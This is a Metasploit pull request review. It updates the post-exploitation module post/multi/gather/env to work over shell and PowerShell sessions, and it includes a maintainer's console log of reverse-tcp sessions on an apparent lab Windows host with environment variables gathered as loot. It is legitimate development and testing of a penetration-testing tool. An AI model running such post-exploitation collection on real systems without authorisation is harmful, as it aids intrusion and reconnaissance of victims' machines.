### PR TITLE
post/multi/gather/env: Cleanup and support non-Meterpreter sessions

### PR DESCRIPTION
**Pull request by bcoles**
Resolves Rubocop violations.

Adds documentation.

Adds `Notes` module meta information.

Adds support for non-Meterpreter sessions.

Stores output as loot.

### CODE REVIEW

**Comment by bcoles** [comment]
> Fails on osx meterpreter

Welp. Does it work prior to this PR? (Seems unlikely - the part that is broken is just about the only part I didn't touch / rewrite)

This PR adds support for non-Meterpreter sessions. This module also explicitly excludes OSX from the list of supported platforms: `'Platform' => %w[linux win unix],`.

> Edit: Looks like this fails for `get_envs` too

If there's a bug in Meterpreter OSX support / post lib, I vote someone else resolves it in another PR.

**Comment by bcoles** [comment]
@msjenkins-r7 retest this please.

**Comment by bwatters-r7** [comment]
```
msf6 payload(windows/x64/powershell_reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                     Connection
  --  ----  ----                     -----------                                     ----------
  1         meterpreter x64/windows  DESKTOP-EHIBEQF\msfuser @ DESKTOP-EHIBEQF       10.5.135.101:4567 -> 10.5.132.124:49677 (10.5.
                                                                                     132.124)
  2         shell x64/windows        Shell Banner: Microsoft Windows [Version 10.0.  10.5.135.101:4568 -> 10.5.132.124:49678 (10.5.
                                     18363.418] -----                                132.124)
  3         powershell windows       msfuser @ DESKTOP-EHIBEQF                       10.5.135.101:4569 -> 10.5.132.124:49680 (10.5.
                                                                                     132.124)

msf6 payload(windows/x64/powershell_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-EHIBEQF
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-EHIBEQF\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/powershell_reverse_tcp) > use post/multi/gather/env 
msf6 post(multi/gather/env) > show options

Module options (post/multi/gather/env):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on

msf6 post(multi/gather/env) > set session 1
session => 1
msf6 post(multi/gather/env) > set verbose true
verbose => true
msf6 post(multi/gather/env) > run

[*] Running module against DESKTOP-EHIBEQF (10.5.132.124)
APPDATA=C:\Users\msfuser\AppData\Roaming
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Users\msfuser
LOCALAPPDATA=C:\Users\msfuser\AppData\Local
LOGONSERVER=\\DESKTOP-EHIBEQF
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
OneDrive=C:\Users\msfuser\OneDrive
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5504
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\msfuser\AppData\Local\Microsoft\WindowsApps;
TEMP=C:\Users\msfuser\AppData\Local\Temp
TMP=C:\Users\msfuser\AppData\Local\Temp
USERDOMAIN=DESKTOP-EHIBEQF
USERDOMAIN_ROAMINGPROFILE=DESKTOP-EHIBEQF
USERNAME=msfuser
USERPROFILE=C:\Users\msfuser
windir=C:\Windows
[+] Results saved to /home/tmoose/.msf4/loot/20220802162546_default_10.5.132.124_windows.environm_595286.txt
[*] Post module execution completed
msf6 post(multi/gather/env) > set session 2
session => 2
msf6 post(multi/gather/env) > run

[*] Running module against DESKTOP-EHIBEQF (10.5.132.124)
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\msfuser\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-EHIBEQF
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Users\msfuser
LOCALAPPDATA=C:\Users\msfuser\AppData\Local
LOGONSERVER=\\DESKTOP-EHIBEQF
NUMBER_OF_PROCESSORS=2
OneDrive=C:\Users\msfuser\OneDrive
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\msfuser\AppData\Local\Microsoft\WindowsApps;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5504
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\msfuser\AppData\Local\Temp
TMP=C:\Users\msfuser\AppData\Local\Temp
USERDOMAIN=DESKTOP-EHIBEQF
USERDOMAIN_ROAMINGPROFILE=DESKTOP-EHIBEQF
USERNAME=msfuser
USERPROFILE=C:\Users\msfuser
windir=C:\Windows
[+] Results saved to /home/tmoose/.msf4/loot/20220802162552_default_10.5.132.124_windows.environm_300128.txt
[*] Post module execution completed
msf6 post(multi/gather/env) > set session 3
session => 3
msf6 post(multi/gather/env) > run

[*] Running module against DESKTOP-EHIBEQF (10.5.132.124)
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\msfuser\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-EHIBEQF
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Users\msfuser
LOCALAPPDATA=C:\Users\msfuser\AppData\Local
LOGONSERVER=\\DESKTOP-EHIBEQF
NUMBER_OF_PROCESSORS=2
OneDrive=C:\Users\msfuser\OneDrive
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\msfuser\AppData\Local\Microsoft\WindowsApps;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=5504
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSExecutionPolicyPreference=Bypass
PSModulePath=C:\Users\msfuser\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\msfuser\AppData\Local\Temp
TMP=C:\Users\msfuser\AppData\Local\Temp
USERDOMAIN=DESKTOP-EHIBEQF
USERDOMAIN_ROAMINGPROFILE=DESKTOP-EHIBEQF
USERNAME=msfuser
USERPROFILE=C:\Users\msfuser
windir=C:\Windows
[+] Results saved to /home/tmoose/.msf4/loot/20220802162558_default_10.5.132.124_windows.environm_723985.txt
[*] Post module execution completed
msf6 post(multi/gather/env) > 


```

**Comment by bwatters-r7** [comment]
# Release Notes
This PR updates the `post/multi/gather` module to support non-meterpreter sessions like shell and powershell.

**Pull request merged**
